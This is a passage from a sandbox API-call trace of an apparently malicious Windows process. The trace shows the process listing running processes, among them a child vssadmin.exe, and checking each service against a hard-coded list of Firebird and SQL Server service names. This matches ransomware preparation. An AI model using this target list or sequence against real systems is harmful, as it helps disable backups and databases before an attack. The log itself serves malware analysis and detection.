th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0315.152] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0315.152] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.152] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0315.152] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0315.153] lstrlenW (lpString="wdgmug.exe") returned 10 [0315.153] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0315.154] lstrlenW (lpString="cmd.exe") returned 7 [0315.154] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0315.155] lstrlenW (lpString="conhost.exe") returned 11 [0315.155] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0315.155] lstrlenW (lpString="vssadmin.exe") returned 12 [0315.156] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0315.156] lstrlenW (lpString="consent.exe") returned 11 [0315.156] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0315.157] CloseHandle (hObject=0x530) returned 1 [0315.157] Sleep (dwMilliseconds=0x1f4) [0315.768] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a008 [0315.769] EnumServicesStatusExW (in: hSCManager=0x401a008, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0315.770] GetLastError () returned 0xea [0315.770] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x41539d8 [0315.770] EnumServicesStatusExW (in: hSCManager=0x401a008, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x41539d8, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x41539d8, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0315.772] CloseServiceHandle (hSCObject=0x401a008) returned 1 [0315.772] lstrlenW (lpString="Appinfo") returned 7 [0315.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0315.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0315.773] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0315.773] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0315.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0315.773] lstrlenW (lpString="AppXSvc") returned 7 [0315.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0315.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0315.773] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0315.773] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0315.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0315.773] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0315.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0315.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0315.773] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0315.773] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0315.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0315.773] lstrlenW (lpString="Audiosrv") returned 8 [0315.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0315.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0315.773] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0315.773] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0315.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0315.774] lstrlenW (lpString="BFE") returned 3 [0315.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0315.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0315.774] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0315.774] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0315.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0315.774] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0315.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0315.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0315.774] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0315.774] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0315.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0315.774] lstrlenW (lpString="CDPSvc") returned 6 [0315.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0315.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0315.774] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0315.774] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0315.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0315.774] lstrlenW (lpString="ClickToRunSvc") returned 13 [0315.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0315.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0315.774] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0315.774] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0315.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0315.774] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0315.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0315.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0315.775] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0315.775] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0315.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0315.775] lstrlenW (lpString="CryptSvc") returned 8 [0315.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0315.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0315.775] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0315.775] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0315.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0315.775] lstrlenW (lpString="DcomLaunch") returned 10 [0315.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0315.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0315.775] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0315.775] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0315.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0315.775] lstrlenW (lpString="DeviceAssociationService") returned 24 [0315.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0315.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0315.775] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0315.775] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0315.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0315.775] lstrlenW (lpString="Dhcp") returned 4 [0315.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0315.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0315.775] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0315.776] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0315.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0315.776] lstrlenW (lpString="Dnscache") returned 8 [0315.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0315.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0315.776] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0315.776] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0315.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0315.776] lstrlenW (lpString="DPS") returned 3 [0315.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0315.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0315.776] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0315.776] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0315.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0315.776] lstrlenW (lpString="DusmSvc") returned 7 [0315.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0315.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0315.777] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0315.777] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0315.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0315.777] lstrlenW (lpString="EventLog") returned 8 [0315.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0315.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0315.777] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0315.777] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0315.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0315.777] lstrlenW (lpString="EventSystem") returned 11 [0315.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0315.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0315.777] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0315.777] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0315.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0315.777] lstrlenW (lpString="FontCache") returned 9 [0315.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0315.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0315.777] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0315.777] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0315.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0315.777] lstrlenW (lpString="gpsvc") returned 5 [0315.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0315.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0315.777] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0315.777] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0315.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0315.778] lstrlenW (lpString="iphlpsvc") returned 8 [0315.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0315.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0315.778] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0315.778] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0315.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0315.778] lstrlenW (lpString="KeyIso") returned 6 [0315.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0315.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0315.778] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0315.778] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0315.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0315.778] lstrlenW (lpString="LanmanServer") returned 12 [0315.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0315.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0315.778] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0315.778] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0315.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0315.778] lstrlenW (lpString="LanmanWorkstation") returned 17 [0315.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0315.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0315.778] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0315.778] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0315.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0315.779] lstrlenW (lpString="lfsvc") returned 5 [0315.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0315.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0315.779] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0315.779] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0315.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0315.779] lstrlenW (lpString="lmhosts") returned 7 [0315.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0315.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0315.779] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0315.779] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0315.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0315.779] lstrlenW (lpString="LSM") returned 3 [0315.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0315.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0315.779] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0315.779] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0315.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0315.779] lstrlenW (lpString="MpsSvc") returned 6 [0315.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0315.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0315.779] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0315.779] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0315.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0315.779] lstrlenW (lpString="NcbService") returned 10 [0315.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0315.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0315.780] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0315.780] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0315.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0315.780] lstrlenW (lpString="netprofm") returned 8 [0315.780] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0315.780] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0315.780] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0315.780] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0315.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0315.780] lstrlenW (lpString="NgcSvc") returned 6 [0315.780] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0315.780] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0315.780] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0315.780] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0315.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0315.780] lstrlenW (lpString="NlaSvc") returned 6 [0315.780] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0315.780] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0315.780] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0315.780] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0315.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0315.780] lstrlenW (lpString="nsi") returned 3 [0315.780] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0315.780] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0315.780] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0315.780] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0315.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0315.780] lstrlenW (lpString="PcaSvc") returned 6 [0315.781] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0315.781] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0315.781] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0315.781] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0315.781] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0315.781] lstrlenW (lpString="PlugPlay") returned 8 [0315.781] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0315.781] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0315.781] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0315.781] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0315.781] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0315.781] lstrlenW (lpString="Power") returned 5 [0315.781] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0315.781] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0315.781] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0315.781] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0315.781] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0315.781] lstrlenW (lpString="ProfSvc") returned 7 [0315.781] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0315.781] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0315.781] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0315.781] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0315.781] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0315.781] lstrlenW (lpString="RpcEptMapper") returned 12 [0315.781] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0315.781] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0315.781] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0315.781] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0315.781] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0315.781] lstrlenW (lpString="RpcSs") returned 5 [0315.782] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0315.782] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0315.782] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0315.782] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0315.782] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0315.782] lstrlenW (lpString="SamSs") returned 5 [0315.782] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0315.782] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0315.782] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0315.782] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0315.782] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0315.782] lstrlenW (lpString="Schedule") returned 8 [0315.782] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0315.782] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0315.782] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0315.782] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0315.782] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0315.782] lstrlenW (lpString="SecurityHealthService") returned 21 [0315.782] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0315.782] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0315.782] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0315.782] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0315.782] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0315.782] lstrlenW (lpString="SENS") returned 4 [0315.782] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0315.782] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0315.782] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0315.782] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0315.782] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0315.782] lstrlenW (lpString="ShellHWDetection") returned 16 [0315.782] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0315.782] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0315.782] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0315.783] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0315.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0315.783] lstrlenW (lpString="Spooler") returned 7 [0315.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0315.783] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0315.783] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0315.783] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0315.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0315.783] lstrlenW (lpString="StateRepository") returned 15 [0315.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0315.783] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0315.783] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0315.783] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0315.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0315.783] lstrlenW (lpString="SysMain") returned 7 [0315.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0315.783] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0315.783] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0315.783] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0315.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0315.783] lstrlenW (lpString="SystemEventsBroker") returned 18 [0315.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0315.783] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0315.783] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0315.783] 